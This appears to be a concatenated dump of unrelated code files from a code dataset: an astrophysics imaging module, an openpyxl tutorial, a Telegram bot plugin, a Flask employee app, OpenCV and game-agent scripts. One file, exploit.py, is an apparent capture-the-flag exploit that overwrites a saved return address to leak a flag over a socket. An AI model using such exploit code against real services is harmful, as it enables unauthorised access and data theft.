(emitting,\nreflecting and/or obscuring light). Gas may also be displayed with contour\nlines.\n\"\"\"\n\nfrom __future__ import (\n print_function,\n division,\n absolute_import,\n)\n\nimport numpy as np\n\nfrom scipy.ndimage import gaussian_filter\n\nfrom amuse.units import units, constants, nbody_system\nfrom amuse.datamodel import Particles\nfrom amuse.io import read_set_from_file\nfrom amuse.datamodel.rotation import rotate\n\nimport matplotlib.pyplot as plt\n\nfrom amuse.ext.fresco.ubvi import rgb_frame\nfrom amuse.ext.fresco.fieldstars import new_field_stars\n\n\ndef evolve_to_age(stars, age, stellar_evolution=\"SeBa\"):\n \"Evolve stars to specified age with specified code\"\n if stellar_evolution == \"SeBa\":\n from amuse.community.seba.interface import SeBa\n stellar_evolution = SeBa()\n elif stellar_evolution == \"SSE\":\n from amuse.community.sse.interface import SSE\n stellar_evolution = SSE()\n # SSE can result in nan values for luminosity/radius\n else:\n raise \"No such stellar evolution code %s or no code specified\" % (\n stellar_evolution\n )\n stellar_evolution.particles.add_particles(stars)\n if age > 0 | units.yr:\n stellar_evolution.evolve_model(age)\n stars.luminosity = np.nan_to_num(\n stellar_evolution.particles.luminosity.value_in(units.LSun)\n ) | units.LSun\n\n stars.radius = stellar_evolution.particles.radius\n # prevent zero/nan radius.\n x = np.where(\n np.nan_to_num(\n stars.radius.value_in(units.RSun)\n ) == 0.\n )\n stars[x].radius = 0.01 | units.RSun\n\n stellar_evolution.stop()\n return\n\n\ndef calculate_effective_temperature(luminosity, radius):\n temp = np.nan_to_num(\n (\n (\n luminosity\n / (\n constants.four_pi_stefan_boltzmann\n * radius**2\n )\n )**.25\n ).value_in(units.K)\n ) | units.K\n return temp\n\n\ndef make_image(\n stars=None,\n gas=None,\n converter=None,\n image_width=[\n 10. | units.parsec,\n 10. | units.parsec,\n ],\n image_size=[1024, 1024],\n percentile=0.9995,\n age=0. | units.Myr,\n sourcebands=\"ubvri\",\n vmax=None,\n calc_temperature=True,\n mapper_code=None, # \"FiMap\"\n zoom_factor=1.0,\n psf_type=\"hubble\",\n psf_sigma=1.0,\n extinction=False,\n return_vmax=False,\n):\n \"\"\"\n Makes image from gas and stars\n \"\"\"\n mode=[]\n if gas is not None:\n mode.append(\"gas\")\n if stars is not None:\n mode.append(\"stars\")\n if mode == []:\n return\n\n if extinction:\n # Extinction can currently only be handled with FiMap\n mapper_code = \"FiMap\"\n\n if mapper_code == \"FiMap\":\n def mapper():\n from amuse.community.fi.interface import FiMap\n mapper = FiMap(converter, mode=\"openmp\")\n\n # mapper.parameters.minimum_distance = 1. | units.AU\n mapper.parameters.image_size = image_size\n # mapper.parameters.image_target = image_target\n\n mapper.parameters.image_width = image_width\n # mapper.parameters.projection_direction = (\n # (image_target-viewpoint)\n # / (image_target-viewpoint).length()\n # )\n # mapper.parameters.projection_mode = projection\n # mapper.parameters.image_angle = horizontal_angle\n # mapper.parameters.viewpoint = viewpoint\n mapper.parameters.extinction_flag = extinction\n return mapper\n else:\n # Gridify as default\n mapper = None\n mapper_code = \"gridify\"\n\n if \"stars\" not in mode:\n image = column_density_map(\n gas,\n image_width=image_width,\n image_size=image_size,\n mapper_factory=mapper,\n mapper_code=mapper_code,\n zoom_factor=zoom_factor,\n psf_type=psf_type,\n psf_sigma=psf_sigma,\n return_vmax=return_vmax,\n )\n else:\n image = image_from_stars(\n stars,\n image_width=image_width,\n image_size=image_size,\n percentile=percentile,\n calc_temperature=calc_temperature,\n age=age,\n sourcebands=sourcebands,\n gas=gas,\n vmax=vmax,\n mapper_factory=mapper,\n mapper_code=mapper_code,\n zoom_factor=zoom_factor,\n psf_type=psf_type,\n psf_sigma=psf_sigma,\n return_vmax=return_vmax,\n )\n return image\n\n\ndef column_density_map(\n gas,\n image_width=10. | units.parsec,\n image_size=[1024, 1024],\n mapper_factory=None,\n mapper_code=None,\n zoom_factor=1.0,\n psf_type=\"gaussian\",\n psf_sigma=10.0,\n return_vmax=False,\n):\n if mapper_code == \"FiMap\":\n if callable(mapper_factory):\n mapper = mapper_factory()\n\n p = mapper.particles.add_particles(gas)\n p.weight = gas.mass.value_in(units.amu)\n projected = mapper.image.pixel_value\n mapper.stop()\n im = gaussian_filter(\n projected,\n sigma=psf_sigma * zoom_factor,\n order=0,\n )\n else:\n from amuse.ext.fresco.gridify import map_to_grid\n gas_in_mapper = gas.copy()\n gas_in_mapper.weight = gas_in_mapper.mass.value_in(units.amu)\n raw_image = map_to_grid(\n gas_in_mapper.x,\n gas_in_mapper.y,\n weights=gas_in_mapper.weight,\n image_size=image_size,\n image_width=image_width,\n )\n im = gaussian_filter(\n raw_image,\n sigma=psf_sigma * zoom_factor,\n order=0,\n ).T\n if return_vmax:\n return (im, -1)\n return im\n\n\ndef image_from_stars(\n stars,\n image_width=10. | units.parsec,\n image_size=[1024, 1024],\n percentile=0.9995,\n calc_temperature=True,\n age=0. | units.Myr,\n sourcebands=\"ubvri\",\n gas=None,\n vmax=None,\n mapper_factory=None,\n mapper_code=None,\n zoom_factor=1.0,\n psf_type=\"hubble\",\n psf_sigma=1.0,\n return_vmax=False,\n):\n if calc_temperature:\n # calculates the temperature of the stars from their total luminosity\n # and radius, calculates those first if needed\n stars.temperature = calculate_effective_temperature(\n stars.luminosity,\n stars.radius,\n )\n\n vmax, rgb = rgb_frame(\n stars,\n dryrun=False,\n image_width=image_width,\n vmax=vmax,\n multi_psf=False, # True,\n image_size=image_size,\n percentile=percentile,\n sourcebands=sourcebands,\n mapper_factory=mapper_factory,\n gas=gas,\n mapper_code=mapper_code,\n zoom_factor=zoom_factor,\n psf_type=psf_type,\n psf_sigma=psf_sigma,\n )\n if return_vmax:\n return rgb['pixels'], vmax\n return rgb['pixels']\n\n\ndef initialise_image(\n fig=None,\n dpi=150,\n image_size=[2048, 2048],\n length_unit=units.parsec,\n image_width=5 | units.parsec,\n plot_axes=True,\n subplot=0,\n x_offset=0 | units.parsec,\n y_offset=0 | units.parsec,\n z_offset=0 | units.parsec,\n):\n if fig is None:\n if plot_axes:\n left = 0.2\n bottom = 0.2\n else:\n left = 0.\n bottom = 0.\n right = 1.0\n top = 1.0\n figwidth = image_size[0] / dpi / (right - left)\n figheight = image_size[1] / dpi / (top - bottom)\n figsize = (figwidth, figheight)\n\n xmin = x_offset.value_in(length_unit) - 0.5 * image_width.value_in(length_unit)\n xmax = x_offset.value_in(length_unit) + 0.5 * image_width.value_in(length_unit)\n ymin = y_offset.value_in(length_unit) - 0.5 * image_width.value_in(length_unit)\n ymax = y_offset.value_in(length_unit) + 0.5 * image_width.value_in(length_unit)\n\n fig, ax = plt.subplots(nrows=1, ncols=1, figsize=figsize, dpi=dpi)\n fig.subplots_adjust(left=left, right=right, top=top, bottom=bottom)\n\n ax.set_xlim([xmin, xmax])\n ax.set_ylim([ymin, ymax])\n else:\n # Simply clear and re-use the old figure\n ax = fig.get_axes()[subplot]\n ax.cla()\n ax.set_xlabel(\"X (%s)\" % (length_unit))\n ax.set_ylabel(\"Y (%s)\" % (length_unit))\n ax.set_aspect(1)\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.set_facecolor('black')\n return fig\n","sub_path":"src/amuse/ext/fresco/fresco.py","file_name":"fresco.py","file_ext":"py","file_size_in_byte":8960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"168589577","text":"# coding: utf-8\n\nimport openpyxl\n\nwbook = openpyxl.Workbook()\nsheet = wbook.create_sheet('sheet1',0)# 新建工作表(表名,位置)\nfor sheet in wbook: #遍历工作表\n print(sheet.title)\nprint(wbook.sheetnames) #工作表名\nsheet = wbook['Sheet'] # 按名字获取工作表\nsheet2 = wbook.worksheets[0] # 按顺序获取工作表\nsheet.title = 'new_sheet' # 更改表名\nwbook.remove(wbook.worksheets[0]) #删除工作表\n\nprint(sheet.max_row,sheet.max_column) # 工作表最大行列\ntableHead = ['序号', '姓名', '身份证', '档次', '账号', '已交月份']\nfor i in tableHead:\n sheet.cell(1, tableHead.index(i) + 1).value = i # 表头\nsheet.append([]) #插入空白行\nsheet.append(tableHead) #插入数据行\ndata = [[1,2,3],[4,5,6]] # 按行填充数据\nfor x in data:\n sheet.append(x)\n\nsheet['A4'] = 4 #给第4行第A列的单元格赋值为4\nsheet.cell(row=4, column=2, value=10) #给第4行第2列的单元格赋值为10\nsheet.cell(4, 2, 10) #同上\ncell = sheet.cell(4,2)\ncell.value = 'hello, world'\nprint(sheet.cell(4,2).value)\n\n\n# 遍历值\nfor row in sheet.values:\n for value in row:\n print(value)\nfor row in sheet.iter_rows(min_row=1, max_col=3, max_row=2):\n for cell in row:\n print(cell)\n\n# 获取单元格类型,如果是常规,显示general,如果是数字,显示'0.00_ ',如果是百分数显示0%\n# 数字需要在Excel中设置数字类型,直接写入的数字是常规类型\nprint(sheet[\"A4\"].number_format)\n#公式,打印的是公式内容,不是公式计算后的值,程序无法取到计算后的值\nsheet[\"A5\"] = \"=SUM(A1:A3)\"\nprint(sheet[\"A4\"].value)\n#合并后的单元格,脚本单独执行拆分操作会报错,需要重新执行合并操作再拆分\nsheet.merge_cells('A2:D2')\nsheet.unmerge_cells('A2:D2')\n#在第7行之上插入一行\nsheet.insert_rows(7)\n#从第6列开始,删除3列,即删除6、7、8列,如下:\nsheet.delete_cols(6, 3)\n\n# 字体样式\nfrom openpyxl.styles import Font\nfont = Font(name='Calibri',\n size=11,\n color='FF000000',\n bold=False,\n italic=False,\n vertAlign=None,\n underline='none',\n strike=False)\nsheet['A1'].font = font\n# 填充样式\nfrom openpyxl.styles import PatternFill\n# fill_type 的样式为 None 或 solid\ncell.fill = PatternFill(fill_type=cell.fill.fill_type, fgColor=cell.fill.fgColor)\nfrom openpyxl.styles import Border, Side\n# 边框样式\nborder = Border(left=Side(border_style=None, color='FF000000'),\n right=Side(border_style=None, color='FF000000'),\n top=Side(border_style=None, color='FF000000'),\n bottom=Side(border_style=None, color='FF000000'),\n diagonal=Side(border_style=None, color='FF000000'),\n diagonal_direction=0,\n outline=Side(border_style=None, color='FF000000'),\n vertical=Side(border_style=None, color='FF000000'),\n horizontal=Side(border_style=None, color='FF000000')\n)\n# 对齐 horizontal 的值有:distributed, justify, center, left, fill, centerContinuous, right, general\n# vertical 的值有:bottom, distributed, justify, center, top\nfrom openpyxl.styles import Alignment\nalignment=Alignment(horizontal='general',\n vertical='bottom',\n text_rotation=0,\n wrap_text=False,\n shrink_to_fit=False,\n indent=0)\n# 整行或整列应用样式\n# 合并的单元格可以想象成左上角的单元格来操作。\ncol = sheet.column_dimensions['A']\ncol.font = Font(bold=True)\nrow = sheet.row_dimensions[1]\nrow.font = Font(underline=\"single\")\n\nwbook.save('../resource/OpenPyxlTest.xlsx')","sub_path":"jingle/test/OpenPyxlTest.py","file_name":"OpenPyxlTest.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"342408590","text":"#!/usr/bin/python\n\nfrom pwn import *\n\n\n\nconn = remote('localhost', 1337)\n\n# this builds a reliable chain of calls to func_b2\n# just to get us to a stable starting point\npayload = \"\\x80\\x90\\x14\\x90\\x14\\x90\\x14\\xf1\"\n# in function func_b2, count is 68, bufsize is 0x84\n# in function func_36, count is 67, bufsize is 0x94\n# in function func_b2, count is 66, bufsize is 0x84\n# in function func_b2, count is 65, bufsize is 0x84\n# in function func_b2, count is 64, bufsize is 0x84\n# in function func_b2, count is 63, bufsize is 0x84\n# in function func_13, count is 62, bufsize is 0x08\n\n# This has the net effect of xoring the local buffer\n# with 0x00 i.e do nothing. Stack Ninja!!\nnulls = '\\x10'*(6*4 + 1) \n\n# we need to know the current saved eip \n# so that we know what to xor it with\nsaved_eip = 0x804e06c\nzor = 0x10101010\n\n# going to call sock_send\n# int sock_send(int sockfd, char *buf, size_t length);\n# sock_send(4, &flag_loc, 256);\nsock_send = 0x080487db\nflag_loc = 0x805b6c0\nsock_fd = 4\npops = 0x805454d #stackCleaning pop esi; pop edi; pop ebp; ret\nexit_plt = 0x8048600 #0x0805b604 <got address woops\neip_pop = p32(saved_eip ^ zor ^ pops)\n\nchain = payload + nulls + eip_pop \nchain += p32(zor)+p32(zor)+p32(zor)#+p32(zor)\n# chain += p32(zor ^ 0x00000025)\nchain += p32(sock_send ^ zor)\nchain += p32(zor)\nchain += p32(sock_fd ^ zor ^ 0xe1000000)\nchain += p32(flag_loc ^ zor) \nchain += p32(0xff ^ zor) # length\n# chain += p32(exit_plt ^ zor)\n# chain += p32(0x00000000 ^ zor)\n\nwith open(\"payload.txt\", 'w+') as f:\n\tf.write(chain)\n\nconn.sendline(chain)\n\n# conn.recv(1000)\nconn.interactive()\n\n\n","sub_path":"The_Good_Stuff/rhino/RinoxChallenge/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"94399038","text":"\"\"\"Check if userbot alive. If you change these, you become the gayest gay such that even the gay world will disown you.\"\"\"\n#IMG CREDITS: @WhySooSerious\nimport asyncio\nfrom telethon import events\nfrom uniborg.util import admin_cmd\nfrom userbot import ALIVE_NAME\nfrom telethon.tl.types import ChannelParticipantsAdmins\nDEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else \"Unknown\"\nPM_IMG = \"https://telegra.ph/file/4161fabad95cc63d78a64.png\"\npm_caption = \"**🎊 Congratulazioni! 🎉**\\n\"\npm_caption += \"Non avevo mai letto così tante pagliacciate in una volta sola e ho deciso di conferirti un riconoscimento..\\n\\n\"\npm_caption += \"**SEI UFFICIALMENTE UN NUOVO PAGLIACCIO DI NAZLAND! 🤡**\"\n\n@borg.on(admin_cmd(\"nazclown\"))\nasync def friday(nazclown):\n chat = await nazclown.get_chat()\n \"\"\" For .alive command, check if the bot is running. \"\"\"\n await borg.send_file(nazclown.chat_id, PM_IMG,caption=pm_caption)\n await nazclown.delete()\n\n \n@borg.on(admin_cmd(pattern=r\"nazclown\", allow_sudo=True))\nasync def friday(nazclown):\n chat = await nazclown.get_chat()\n \"\"\" For .alive command, check if the bot is running. \"\"\"\n await borg.send_file(nazclown.chat_id, PM_IMG,caption=pm_caption)\n","sub_path":"userbot/plugins/nazclown.py","file_name":"nazclown.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"507642029","text":"from nfa import *\nfrom state import *\nfrom transition import *\n\nclass Base(object):\n\n\t#constructor: \tconstructos new regx or character\n\t#argument:\tregx; possible expression\n\t#argument:\tchar; possible base character a, b or e\n\t#only one argument may be valid.\n\tdef __init__(self, regx, char):\n\t\tself.regx = regx\n\t\tself.char = char\n\n\t#recursively evaluate the regx or character into a single nfa\n\tdef eval(self):\n\t\tif (self.regx != None):\n\t\t\tbase_nfa = self.regx.eval()\n\t\tif (self.char != None):\n\t\t\tbase_start = State()\n\t\t\tbase_start.set_state(True, False)\n\n\t\t\tbase_final = State()\n\t\t\tbase_final.set_state(False, True)\n\t\n\t\t\tbase_transition = Transition(self.char, base_final)\n\t\n\t\t\tbase_start.add_transition(base_transition)\n\t\n\t\t\tbase_nfa = NFA(base_start, base_final)\n\t\n\t\treturn base_nfa\n","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"126654369","text":"import cv2\nimport numpy as np\n\nframe_scale = 1.5\nycl = 27\nych = 662\nxcl = 68\nxch = 700\n\n# get xy from centroids\ndef getControl():\n centroid_from_Picture()\n #cen = centroid_from_Picture()\n return xy_from_centroid(1)\n\n\noffset = 94.5\n\n\n# captures picture and processes centroids\ndef centroid_from_Picture():\n cap = cv2.VideoCapture(0)\n ret, frame = cap.read()\n cap.release()\n #frame = cv2.imread('picture.png')\n frame = cv2.resize(frame, None, fx = frame_scale, fy = frame_scale )\n frame = frame[ ycl:ych, xcl:xch ]\n blur = cv2.GaussianBlur( frame, (5,5), 0 )\n\n img = frame\n hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\n shapes = getShapes(frame, hsv)\n\n # centroids = getCentroids(shapes, gray)\n # centroids = getCentroids2(shapes,frame)\n getCentroids2( shapes, frame )\n # return centroids\n\n\n# should be tuples of (\n# color (String),\n# lower bound (array), upper bound (array) )\n#colors = [('red', np.array([177, 76, 92]), np.array([255, 255, 255])),\n # ('blue', np.array([52, 58, 77]), np.array([130, 255, 255])),\n # ('yellow', np.array([19, 57, 108]), np.array([87, 255, 255])),\n # ('yellow', np.array([19, 57, 108]), np.array([87, 255, 255])),\n # ('brown', np.array([150, 47, 43]), np.array([180, 143, 88])),\n # ('black', np.array([52, 0, 0]), np.array([148, 74, 74]))]\ncolors = [('red', np.array([0, 187, 46]), np.array([179, 255, 132]) ),\n\t('blue', np.array([65, 69, 77]), np.array([142, 255, 255]) ),\n\t('yellow', np.array([0, 64, 146]), np.array([65, 255, 255]) ),\n\t('pink', np.array([159, 77, 113]), np.array([179, 212, 255]) ),\n\t('brown', np.array([16, 102, 42]), np.array([171, 255, 93]) ),\n\t('black', np.array([0, 0, 0]), np.array([179, 71, 67]) )]\n\n# creates color segmentation of the workspace.\ndef getShapes(image, h):\n masks = []\n for (c, l, u) in colors:\n mask = cv2.inRange(h, l, u)\n mod = morphologicalTrans(mask)\n cv2.imshow('m',mask)\n cv2.waitKey(1000)\n cv2.imshow('mod',mod)\n cv2.waitKey(1000)\n masks.append(mod)\n\n # # gets first shape from image\n # shapes = cv2.bitwise_and(image, image, mask = masks[0])\n #\n # # gets resulting shapes and or with current shape.\n # for i in range(1, len(masks)):\n # sh = cv2.bitwise_and(image, image, mask = masks[i])\n # # shapes = cv2.bitwise_or(shapes, shapes, mask = sh)\n # shapes = cv2.add(shapes, sh)\n # cv2.imshow('cool',shapes)\n # cv2.waitKey(1000)\n return masks\n\ndef getCentroids2(shapes,frame):\n i = 0\n c = spotCentroid( shapes[i] )\n print(c)\n\nlower_thresh = 40\ndef spotCentroid( mask ):\n thresh = mask\n #ret, thresh = cv2.threshold( mask, lower_thresh, 240, 0 )\n contours, hierarchy = cv2.findContours( thresh, 1, 2 )\n\n M = [cv2.moments(contours[i]) for i in range(0, len(contours))]\n cx = [(int(m['m10'] / m['m00'])) for m in M]\n cy = [(int(m['m01'] / m['m00'])) for m in M]\n cen = list(zip(cx, cy))\n\n cv2.drawContours(mask, contours, -1, (255, 0, 0), 2)\n lineThickness = 6\n for i in range(0, len(cx)):\n cv2.line(mask, (cx[i], cy[i]), (cx[i] + 1, cy[i] + 1), (120, 120, 0), lineThickness)\n\n cv2.imshow(\"Cool\", mask)\n cv2.waitKey(2000)\n return cen\n\n# gets the centroid from segmentation\ndef getCentroids(shapes, g):\n ret, thresh = cv2.threshold(g, lower_thresh, 240, 0)\n contours, hierarchy = cv2.findContours(thresh, 1, 2)\n\n M = [cv2.moments(contours[i]) for i in range(0, len(contours))]\n cx = [(int(m['m10'] / m['m00'])) for m in M]\n cy = [(int(m['m01'] / m['m00'])) for m in M]\n cen = list(zip(cx, cy))\n return cen\n\n\n# processes all centroids for publishing\ndef xy_from_centroid(centroid_points):\n result = list(map(camera_transfer, centroid_points))\n return result\n\n\n# converts a centroid point to a camera function\ndef camera_transfer(centroid_point):\n return centroid_point\n\ndef morphologicalTrans(mask):\n # kernel = np.ones((5, 5), np.uint8)\n # kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))\n # dilation = cv2.dilate(mask, kernel, iterations=2)\n # erosion = cv2.erode(dilation, kernel, iterations=5)\n\n # opening = cv2.morphologyEx(mask, cv2.MORPH_GRADIENT, kernel)\n opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel )\n # closing = cv2.morphologyEx(mask, cv2.MORPH_GRADIENT, kernel)\n return opening\n\nif __name__ == '__main__':\n centroid_from_Picture()\n # try:\n # Centroid()\n # except rospy.ROSInterruptException:\n # pass\n","sub_path":"CVStackTest.py","file_name":"CVStackTest.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"160712712","text":"from src.templating import Request, render_template\n\nlang = {\n \"ru\": {\n \"title\": \"Удалить сессию\",\n \"route\": {\n \"panel\": \"Панель управления\",\n \"delete_session\": \"Удалить сессию\",\n },\n },\n}\n\n\nasync def response(request: Request) -> render_template:\n request.session.clear()\n return await render_template(\"route/panel/delete_session.html\", context={\n \"lc\": lang[request.lang],\n })\n","sub_path":"public/route/panel/delete_session.py","file_name":"delete_session.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"566157036","text":"class Solution:\r\n def plusOne(self, digits: List[int]) -> List[int]:\r\n number = 0\r\n size = len(digits)-1\r\n for i in range(len(digits)):\r\n number += digits[i]*(10**size)\r\n size -= 1\r\n number += 1\r\n output = []\r\n output = list(map(int,str(number)))\r\n return output\r\n","sub_path":"week1/1/1-5_신예준_20210705.py","file_name":"1-5_신예준_20210705.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"391878783","text":"#!/usr/bin/env python\n\n_test_x = r'''\n/var/tmp/5g.img\n 1 boot\n 1 root\n 1 *swap\n - home\n'''[1:]\n\n_client_a_a = r'''\n/dev/sda\n 2 boot\n 8 overlay\n64 root\n 8 *swap\n 8 home\n32 src\n 8 local\n - opt\n'''[1:]\n\n_client_b_a = _client_a_a.replace('/dev/sda', '/dev/sdb')\n\n_client_a_a0 = r'''\n/dev/sda\n 2 boot\n64 *root\n 8 *swap\n 8 *home\n32 *src\n 8 *local\n - *opt\n'''[1:]\n\n_client_b_a0 = _client_a_a0.replace('/dev/sda', '/dev/sdb')\n\n_client_a_a1 = r'''\n/dev/sda\n 2 boot\n - -\n'''[1:]\n\n_client_b_a1 = _client_a_a1.replace('/dev/sda', '/dev/sdb')\n\n_client_h2 = r'''\n/dev/sda\n 4 boot\n32 root\n 8 *swap\n 8 home\n16 src\n 8 local\n - opt\n'''[1:]\n\n_server_e = r'''\n/dev/sdc\n 1 boot\n 4 root\n 4 *swap\n 4 home\n - srv\n'''[1:]\n","sub_path":"data/partdata.py","file_name":"partdata.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"534972107","text":"from flask import render_template, flash, redirect, url_for, request\nfrom flask_login import current_user, login_user, login_required, logout_user\nfrom werkzeug.urls import url_parse\nfrom app import db, app\nfrom app.forms import LoginForm, RegistrationForm, EmpForm, UpdateEmpForm\nfrom app.models import Admin, Employee\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n employees = Employee.query.all()\n return render_template('index.html', title='Home', employees=employees)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = Admin.query.filter_by(email=form.email.data).first()\n if user is None or not user.check_password(form.password.data):\n flash('Invalid email or password', 'danger')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n return redirect(next_page)\n return render_template('login.html', title='Sign In', form=form)\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = RegistrationForm()\n if form.validate_on_submit():\n admin = Admin(email=form.email.data)\n admin.set_password(form.password.data)\n db.session.add(admin)\n db.session.commit()\n flash('Congratulations, you are now an Admin', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route('/add_emp', methods=['GET', 'POST'])\n@login_required\ndef add_emp():\n form = EmpForm()\n if form.validate_on_submit():\n employee = Employee(email=form.email.data,\n name=form.name.data,\n phone=form.phone.data,\n location=form.location.data,\n salary=form.salary.data)\n db.session.add(employee)\n db.session.commit()\n flash('Employee added', 'success')\n return redirect(url_for('index'))\n return render_template('add_emp.html', title='Add Employee', form=form)\n\n\n@app.route(\"/employee/<int:id>\")\ndef employee(id):\n employee = Employee.query.get_or_404(id)\n return render_template('employee.html',\n title=employee.name,\n employee=employee)\n\n\n@app.route(\"/employee/<int:id>/update\", methods=['GET', 'POST'])\n@login_required\ndef update_emp(id):\n employee = Employee.query.get_or_404(id)\n\n form = UpdateEmpForm()\n\n if form.validate_on_submit():\n\n email = form.email.data\n phone = form.phone.data\n location = form.location.data\n name = form.name.data\n salary = form.salary.data\n\n data_updated = False\n data_valid = True\n\n if email != employee.email:\n if Employee.query.filter_by(email=email).first() is not None:\n form.email.errors.append(\"Email already exist.\")\n data_valid = False\n else:\n employee.email = email\n data_updated = True\n\n if phone != employee.phone:\n if Employee.query.filter_by(phone=phone).first() is not None:\n form.phone.errors.append(\"Phone No already exist.\")\n data_valid = False\n else:\n employee.phone = phone\n data_updated = True\n\n if location != employee.location or salary != employee.salary \\\n or employee.name != name:\n data_updated = True\n\n if data_updated and data_valid:\n employee.location = location\n employee.salary = salary\n employee.name = name\n db.session.commit()\n flash('Employee details updated', 'success')\n return redirect(url_for('employee', id=id))\n\n elif request.method == 'GET':\n form.name.data = employee.name\n form.email.data = employee.email\n form.phone.data = employee.phone\n form.location.data = employee.location\n form.salary.data = employee.salary\n return render_template('add_emp.html', title='Update Post',\n form=form,)\n\n\n@app.route(\"/employee/<int:id>/delete\", methods=['GET', 'POST'])\n@login_required\ndef delete_emp(id):\n employee = Employee.query.get_or_404(id)\n db.session.delete(employee)\n db.session.commit()\n message = str(employee.name) + ' has been deleted!'\n flash(message, 'success')\n return redirect(url_for('index'))\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"257893681","text":"from puzzle import GameGrid\nfrom agent import *\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\n\ndef main():\n existingAgent1 = None\n with open(\"TrainingPartialCountRunner_100_20_4_5.pickle\", 'rb') as f:\n existingAgent0 = pickle.load(f)\n\n with open(\"ULRD_trained_model_20_game_layers_32_16.pickle\", 'rb') as f:\n existingAgent1 = pickle.load(f)\n\n with open(\"ULRD_trained_model_20_game_layers_64_16.pickle\", 'rb') as f:\n existingAgent2 = pickle.load(f)\n\n with open(\"ULRD_trained_model_20_game_layers_64_16_8.pickle\", 'rb') as f:\n existingAgent3 = pickle.load(f)\n\n with open(\"ULRD_trained_model_20_game_layers_64_32_8.pickle\", 'rb') as f:\n existingAgent4 = pickle.load(f)\n\n with open(\"ULRD_trained_model_20_game_layers_64.pickle\", 'rb') as f:\n existingAgent5 = pickle.load(f)\n\n\n agentDict = {1: RandomAgent(None, waitTime=0), 2: PatternAgentULRD(None, waitTime=0), 0: existingAgent0, 3: DNNAgent(None, waitTime=0, trainName=\"ULRD_train.pickle\"), 4 : existingAgent1, 5 : existingAgent2, 6 : existingAgent2, 7 : existingAgent2, 8 : existingAgent2}\n agentDescription = {1: \"Random\", 2: \"Up-Left-Right-Down\", 0: \"Online learning NN\", 3: \"DNN Agent\", 4: \"DNN Agent with layers [32, 16]\", 5: \"DNN Agent with layers [64, 16]\", 6: \"DNN Agent with layers [64, 16, 8]\", 7: \"DNN Agent with layers [64, 32, 8]\", 8: \"DNN Agent with layers [64]\"}\n agentScoreDict = {1: [], 2: [], 0: [], 3: [], 4: [], 5: [], 6: [], 7: [], 8: []}\n agentColors = {1: \"b\", 2: \"r\", 0: \"#1f004d\", 3: \"g\", 4: \"c\", 5: \"m\", 6: \"y\",7: \"k\",8: \"#3CFE6E\"}\n\n gameIDs = []\n for i in range (0, 15):\n gameIDs.append(i)\n random.seed(i)\n for (agentKey, agent) in agentDict.items():\n gamegrid = GameGrid()\n gamegrid.hide()\n gamegrid.setAgent(agent)\n agent.setGameGrid(gamegrid)\n gamegrid.mainloop()\n agentScoreDict[agentKey].append(sumScoreMatrix(gamegrid.matrix))\n print(agentScoreDict[agentKey])\n agent.reset()\n\n plotTrainingRecord(gameIDs, agentDict, agentDescription, agentScoreDict, agentColors)\n\n\n\ndef sumScoreMatrix(mat):\n sum = 0\n for i in range(4):\n for j in range(4):\n sum += mat[i][j]\n return sum\n\ndef plotTrainingRecord(gameIDs, agentDict, agentSummarys, agentScoreDict, agentColors):\n ind = np.arange(len(gameIDs))\n fig, ax = plt.subplots()\n x = agentDict.keys()\n\n offset = 0\n for key in x:\n ax.bar(ind + offset, agentScoreDict[key], width=0.1,color=agentColors[key])\n offset += 0.11\n\n ax.legend(agentColors.values(), agentSummarys.values())\n\n ax.autoscale_view()\n\n custom_lines = [Line2D([0], [0], color=agentColors[1], lw=4),\n Line2D([0], [0], color=agentColors[2], lw=4),\n Line2D([0], [0], color=agentColors[0], lw=4),\n Line2D([0], [0], color=agentColors[3], lw=4),\n Line2D([0], [0], color=agentColors[4], lw=4),\n Line2D([0], [0], color=agentColors[5], lw=4),\n Line2D([0], [0], color=agentColors[6], lw=4),\n Line2D([0], [0], color=agentColors[7], lw=4),\n Line2D([0], [0], color=agentColors[8], lw=4)]\n\n fig, ax = plt.subplots()\n ax.legend(custom_lines, 